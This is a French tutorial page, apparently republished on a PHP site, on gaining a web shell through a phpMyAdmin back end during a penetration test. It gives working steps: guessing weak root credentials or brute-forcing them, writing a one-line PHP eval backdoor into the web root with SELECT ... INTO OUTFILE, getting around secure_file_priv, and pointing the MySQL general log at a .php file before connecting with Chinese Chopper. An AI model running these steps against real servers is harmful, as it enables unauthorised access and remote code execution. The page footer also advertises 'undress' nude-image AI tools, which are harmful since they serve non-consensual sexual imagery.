Table des matières
Introduction à PhpMyAdmin
Maison base de données phpMonAdmin Getshell en arrière-plan PhpMyAdmin (test d'intrusion)

Getshell en arrière-plan PhpMyAdmin (test d'intrusion)

Jun 17, 2021 pm 02:57 PM
phpmyadmin

Ce qui suit est une introduction au getshell d'arrière-plan PhpMyAdmin (test de pénétration) de la colonne du didacticiel phpmyadmin. J'espère que cela sera utile aux amis dans le besoin !

Introduction à PhpMyAdmin

PhpMyAdmin est basé sur PHP et structuré en Web-Base. 🎜>L'outil de gestion de base de données MySQL sur l'hébergeur du site Web permet aux administrateurs d'utiliser l'interface Web pour gérer la base de données MySQL. Cette interface Web peut constituer un meilleur moyen de saisir une syntaxe SQL complexe de manière simple, en particulier lorsqu'il s'agit d'importer et d'exporter de grandes quantités de données.
Getshell en arrière-plan PhpMyAdmin (test dintrusion) Après avoir collecté et détecté la cible, lorsqu'il s'avère qu'il existe un répertoire phpmyadmin (vous pouvez essayer :
), vous pouvez directement essayer d'utiliser le mot de passe faible (http://ip:端口/phpmyadmin/) pour créer le compte root Mot de passe root ) ou cracker par force brute pour accéder à l'arrière-plan de gestion, il existe de nombreuses façons d'obtenir Shell.
Getshell en arrière-plan PhpMyAdmin (test dintrusion)

dans un cheval de Troie d'exportation de fichier

Si vous souhaitez insérer un cheval de Troie à l'intérieur du site Web, le principe est que vous devez connaître le chemin absolu du site Web. de nombreuses méthodes, comme obtenir le chemin en signalant une erreur et en passant phpinfo.php et ainsi de suite (veuillez vous référer à un autre article de blog : https://blog.csdn.net/weixin_39190897/article/details/99078864).

Le moyen le plus pratique est d'utiliser

pour vérifier directement (mais parfois vous ne pouvez pas le trouver, vous devez donc trouver un autre moyen) : select @@basedir;
Getshell en arrière-plan PhpMyAdmin (test dintrusion)

Sur la base des commentaires ci-dessus, nous pouvons voir que l'emplacement de MySQL se trouve dans le répertoire

. D:softphpStudyMySQL

Après avoir obtenu le chemin du site Web, vous pouvez tenter de télécharger le cheval de Troie. La méthode la plus courante consiste à écrire une phrase du cheval de Troie directement dans le répertoire racine du site Web via

 : into outfile

.

select '<?php eval($_POST[cmd]); ?>' into outfile 'D:softphpStudywwwxxx.php';

Mais dans la nouvelle version de MySQL, cette phrase ne s'est pas exécutée avec succès.


Getshell en arrière-plan PhpMyAdmin (test dintrusion) La nouvelle fonctionnalité de Mysql
aura un impact sur la lecture et l'écriture des fichiers. Ce paramètre permet de limiter l'import et l'export. Nous pouvons utiliser la commande secure_file_priv pour afficher ce paramètre : show global variables like '%secure%';
Getshell en arrière-plan PhpMyAdmin (test dintrusion) Lorsque
est NULL, cela signifie que Mysql ne peut pas importer et exporter, donc une erreur se produit. Pour réussir l'exportation de cette instruction, vous devez modifier le fichier secure_file_priv dans le dossier Mysql et ajouter my.ini à [mysqld] : secure_file_priv =""
Getshell en arrière-plan PhpMyAdmin (test dintrusion) Lorsque la valeur de
n'est pas une valeur spécifique , cela signifie qu'il n'y a aucune restriction sur l'importation/exportation de mysqld et que la commande d'exportation peut être exécutée à ce moment-là. secure_file_priv

Utilisation des fichiers journaux Mysql

Mysql version 5.0 et supérieure créera des fichiers journaux En modifiant les variables globales du journal, vous pouvez également getshell. Mais vous devez également disposer d’autorisations de lecture et d’écriture sur les journaux générés. (Remarque : le test personnel sous Linux a échoué en raison de problèmes d'autorisation). Introduisons d'abord deux variables globales MySQL :

et general_log. general_log file

  1. journal général fait référence à l'état de sauvegarde du journal, ON signifie ouvert, OFF signifie fermé
  2. fichier journal général fait référence au chemin de sauvegarde du journal.
Commande pour afficher l'état du journal :

show variables like '%general%';
Getshell en arrière-plan PhpMyAdmin (test dintrusion) Dans la configuration ci-dessus, lorsque le général est activé, les instructions SQL exécutées par
apparaîtront dans FichierWIN-30DFNC8L78A.log.

Ensuite, si la valeur de general_log_file est modifiée, l'instruction SQL exécutée sera générée en conséquence, puis getshell sera généré.
Getshell en arrière-plan PhpMyAdmin (test dintrusion)Getshell en arrière-plan PhpMyAdmin (test dintrusion)
En conséquence, le fichier xxx.php sera généré
Getshell en arrière-plan PhpMyAdmin (test dintrusion)
Écrivez une phrase de cheval de Troie dans le fichier xxx.php : SELECT '<?php eval($_POST["cmd"]);?>'
Getshell en arrière-plan PhpMyAdmin (test dintrusion)
Ensuite, vous pouvez voir la déclaration du cheval de Troie enregistrée dans le fichier journal :
Getshell en arrière-plan PhpMyAdmin (test dintrusion) Enfin, la connexion Chinese Chopper, getshell :
Getshell en arrière-plan PhpMyAdmin (test dintrusion)

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn

Outils d'IA chauds

Undress AI Tool

Undress AI Tool

Images de déshabillage gratuites

Undresser.AI Undress

Undresser.AI Undress

Application basée sur l'IA pour créer des photos de nu réalistes

AI Clothes Remover

AI Clothes Remover

Outil d'IA en ligne pour supprimer les vêtements des photos.

Clothoff.io

Clothoff.io

Dissolvant de vêtements AI

Video Face Swap

Video Face Swap

Échangez les visages dans n'importe quelle vidéo sans effort grâce à notre outil d'échange de visage AI entièrement gratuit !

Outils chauds

Bloc-notes++7.3.1

Bloc-notes++7.3.1

Éditeur de code facile à utiliser et gratuit

SublimeText3 version chinoise

SublimeText3 version chinoise

Version chinoise, très simple à utiliser

Envoyer Studio 13.0.1

Envoyer Studio 13.0.1

Puissant environnement de développement intégré PHP

Dreamweaver CS6

Dreamweaver CS6

Outils de développement Web visuel

SublimeText3 version Mac

SublimeText3 version Mac

Logiciel d'édition de code au niveau de Dieu (SublimeText3)

Sujets chauds

Tutoriel PHP
1600
276
Comment définir la clé primaire dans phpmyadmin Comment définir la clé primaire dans phpmyadmin Apr 07, 2024 pm 02:54 PM

La clé primaire d'une table est constituée d'une ou plusieurs colonnes qui identifient de manière unique chaque enregistrement de la table. Voici les étapes pour définir une clé primaire : Connectez-vous à phpMyAdmin. Sélectionnez la base de données et la table. Cochez la colonne que vous souhaitez utiliser comme clé primaire. Cliquez sur "Enregistrer les modifications". Les clés primaires offrent des avantages en matière d’intégrité des données, de vitesse de recherche et de modélisation des relations.

Comment ajouter des clés étrangères dans phpmyadmin Comment ajouter des clés étrangères dans phpmyadmin Apr 07, 2024 pm 02:36 PM

L'ajout d'une clé étrangère dans phpMyAdmin peut être réalisé en suivant ces étapes : Sélectionnez la table parent qui contient la clé étrangère. Modifiez la structure de la table parent et ajoutez de nouvelles colonnes dans "Colonnes". Activez les contraintes de clé étrangère et sélectionnez la table et la clé de référencement. Définir les opérations de mise à jour/suppression. Sauvegarder les modifications.

Comment supprimer une table de données dans phpmyadmin Comment supprimer une table de données dans phpmyadmin Apr 07, 2024 pm 03:00 PM

Étapes pour supprimer une table de données dans phpMyAdmin : Sélectionnez la base de données et la table de données ; cliquez sur l'onglet « Action » ; sélectionnez l'option « Supprimer » ; confirmez et effectuez l'opération de suppression.

Où existe la base de données wordpress ? Où existe la base de données wordpress ? Apr 15, 2024 pm 10:39 PM

La base de données WordPress est hébergée dans une base de données MySQL qui stocke toutes les données du site Web et est accessible via le tableau de bord de votre fournisseur d'hébergement, FTP ou phpMyAdmin. Le nom de la base de données est lié à l'URL du site Web ou au nom d'utilisateur, et l'accès nécessite l'utilisation des informations d'identification de la base de données, notamment le nom, le nom d'utilisateur, le mot de passe et le nom d'hôte, qui sont généralement stockés dans le fichier « wp-config.php ».

Que dois-je faire si Navicat ne parvient pas à se connecter ? Que dois-je faire si Navicat ne parvient pas à se connecter ? Apr 23, 2024 am 10:00 AM

Lorsque Navicat ne parvient pas à se connecter, vous pouvez essayer les solutions suivantes dans l'ordre : Vérifiez si les informations de connexion sont correctes, telles que le nom de la base de données, le nom d'hôte, le numéro de port, le nom d'utilisateur et le mot de passe. Assurez-vous que la base de données est opérationnelle. Vérifiez les règles de pare-feu pour confirmer que Navicat et les services associés ne sont pas bloqués. Essayez d'utiliser la commande ping pour tester votre connexion réseau. Mettez à jour le logiciel client Navicat vers la dernière version. Vérifiez les journaux du serveur pour les messages d'erreur liés aux échecs de connexion. Essayez de vous connecter à l'aide d'autres outils de base de données pour résoudre les problèmes spécifiques à Navicat.

Comment définir des clés étrangères dans phpmyadmin Comment définir des clés étrangères dans phpmyadmin Apr 07, 2024 pm 03:03 PM

Comment configurer des clés étrangères ? Créez une table principale et une sous-table. Ouvrez le tableau de bord phpMyAdmin. Sélectionnez la table principale. Ouvrez l'onglet "Structure". Ajoutez une colonne de clé étrangère et sélectionnez la colonne associée dans la table enfant. Sélectionnez le type de clé étrangère (tel que "CASCADE"). Sauvegarder les modifications.

Que faire si l'installation de phpmyadmin échoue Que faire si l'installation de phpmyadmin échoue Apr 07, 2024 pm 03:15 PM

Étapes de dépannage en cas d'échec de l'installation de phpMyAdmin : Vérifiez la configuration système requise (version PHP, version MySQL, serveur Web) ; activez les extensions PHP (mysqli, pdo_mysql, mbstring, token_get_all) ; vérifiez les paramètres du fichier de configuration (hôte, port, nom d'utilisateur, mot de passe) ; autorisations (propriété du répertoire, autorisations de fichiers) ; vérifier les paramètres du pare-feu (liste blanche des ports du serveur Web) ; consulter les journaux d'erreurs (/var/log/apache2/error.log ou /var/log/nginx/error.log) ; phpMonAdmin

Comment exporter Excel avec phpmyadmin Comment exporter Excel avec phpmyadmin Apr 07, 2024 pm 02:24 PM

Exporter les données au format Excel via phpMyAdmin : Après vous être connecté à phpMyAdmin, sélectionnez la base de données et le tableau à exporter. Cliquez sur l'option "Exporter" et sélectionnez "Excel" dans le menu déroulant "Format". Choisissez vos propres colonnes d'exportation, options de requête et autres options d'exportation. Cliquez sur le bouton "Dump" pour démarrer l'exportation et télécharger le fichier Excel exporté.

See all articles